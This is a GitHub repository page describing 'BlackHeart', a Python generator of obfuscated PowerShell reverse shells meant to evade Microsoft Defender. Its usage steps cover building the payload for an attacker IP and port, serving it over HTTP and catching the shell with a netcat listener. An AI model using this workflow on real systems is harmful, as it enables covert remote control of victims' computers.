Skip to content

BlackHeart is a simple python script to generate powershell scripts that demonstrate reverse shell gaining without Microsoft Defender restrictions. (FOR EDUCATIONAL PURPOSES!!)

License

Notifications You must be signed in to change notification settings

CYB3RMX/BlackHeart

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 
 
 

Repository files navigation

BlackHeart


BlackHeart is a simple python script to generate powershell scripts that demonstrate reverse shell gaining without Microsoft Defender restrictions. (FOR EDUCATIONAL PURPOSES!!)

Updates

04/09/2022

  • Added basic obfuscation to reverse shell file.
  • Bug fixes.

Setup

You can use simply the following command

pip3 install -r requirements.txt

Usage

  • First of all you have to generate a template for your shell.
python3 blackheart.py --lhost YOUR_IP --lport YOUR_PORT
  • Then you have to open a simple http server to serve your template.
python3 -m http.server
  • And you need to open a listener port to listen incoming connections.
nc -lvp 4545

PoC

POC.mp4

About

BlackHeart is a simple python script to generate powershell scripts that demonstrate reverse shell gaining without Microsoft Defender restrictions. (FOR EDUCATIONAL PURPOSES!!)

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages